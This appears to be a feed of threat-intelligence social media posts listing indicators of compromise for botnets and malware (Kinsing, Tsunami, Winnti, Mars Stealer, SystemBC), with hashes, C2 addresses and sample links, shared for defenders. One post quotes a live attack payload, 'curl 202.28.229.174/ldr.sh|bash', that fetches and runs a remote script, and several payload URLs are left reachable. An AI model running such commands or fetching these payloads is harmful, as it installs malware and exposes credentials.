Tsunami botnet update #log4j IoC: ldap 135.148.132.224:1389 hxxp://106.246.224.219/.l/pty3 hxxp://106.246.224.219/.l/pty4 MalwareBazaar : bazaar.abuse.ch/sample/177de2e…

#Kinsing botnet exploiting #log4j IoCs: ldap/web: 178[.]20[.]40[.]227 kinsing bin: bazaar.abuse.ch/sample/5d2530b… curl-amd64: 6b9e23cb675be370a18a0c4482dc566be28920d4f1cd8ba6b4527f80acf978d3 libsystem .so: c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

Another large size net associated with #SystemBC Malware c2 (31.44.185(.)11) From Russia ( WebLine LTD ) more than 16000 victim infected cc: Cryptolaemus Germán Fernández 𝚍𝚛𝚎𝚊𝚖𝚎𝚛 ` 💫

Recent Chinese Threat Actor #Winnti panel C2: ip: 204.15.78.131:3220 (TCP) url: us\.\host.skybad\.\top Actual Payload hosted here : http://160.251.42(.)252/xghk.exe hash: c99397d66e49e2def1b17f57cd0c5fb9 #GoldDragon #ZxShell #threatintel cc: Mikhail Kasimov (;

Will you be interested to join our #shellcode ADVANCED workshop w/#radare2 to study & RE on how recent threats are using shellcode in their actions aim Win/Mac/Linux OS? This vote will decide workshop planning, your answers matter! cc: Joseph paπcake 🌱 🏴󠁥󠁳󠁣󠁴󠁿 radare #MalwareMustDie

Recently deployed #Mars #Stealer #Malware C2: http://62.204.41.180/5xtELSMXvf.php Hash: 4d0b2e81d023a1704d0fb71cf3e689ec43a813c4041e6d0d5503de2732d18f15 e5e16ce47ed80d3b802a9c36f7ae408493d1e491ce83f72f253832b150aeb4bc

Currently 𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia They are targeting again India, Brazil, Indonesia,Egypt,Vietnam,Pakistan, Philippines,Mexico C2: hxxp://jsdkct(.)link/47747.php Hash: 95b229600f28adfbe56fc09cd8a8ff88baf261329999f681613e5c951907d451

VirusTotal welcomes ELF DIGEST to the VT multi-sandbox project! blog.virustotal.com/2022/04/virust… by Karl Hiramoto

𝗔𝗰𝘁𝗶𝘃e #Mars #Stealer #Malware spread from CloudLite LLC Russia Threat Actor keep changing urls C2 Domain : http://jsdkca(.)link/518855.php hash: 6e304b4616eb9daa7da76d3c1894d5e62af10fe6dc3d6b2356518dbb1121d6b9 Seems malware infection in maas in this C2

Everybody is familiar with the value of a tool like VirusTotal for malware... Ever wanted a similar tool for analyzing _not_ malware? Check out EchoTrail - solid collection of information & stats about common binaries found on healthy systems. echotrail.io

Están llegando los mineros! 🤖 (CVE-2022-1388) IP atacante: 85.106.114.175 🇹🇷 Payload: curl 202.28.229.174/ldr.sh|bash Muestras: bazaar.abuse.ch/browse/tag/CVE… * Incluye exfiltración de credenciales SSH

Follina patch CVE-2022-30190. (msdt.exe) is out. msrc.microsoft.com/update-guide/e…

📢 In #FIRSTCTI22, リック w/ LACERT teams will share the implementation of FIRST.org #CTI Curriculum methods into their investigation of targeted #WebSkimming threat as takeaways for #BlueTeam first.org/events/symposi… Register soon, we value your time with good sharing!

We are proud to have assisted (along with partners) in the US DoJ & FBI-led disruption of the Moobot malware botnet comprised of SOHO routers utilized by APT 28/Fancy Bear: justice.gov/opa/pr/justice… Data on infections shared in Sinkhole HTTP Events report: shadowserver.org/what-we-do/net…

#microsoft just released a article related to #NorthKorean #ThreatActors microsoft.com/en-us/security… Seems to be that this is a active IOC's related to the ransomware group: 192.177.51.248 ccwaterfall[.]com cc: Toli Mikhail Kasimov Gi7w0rm mRr3b00t Fate112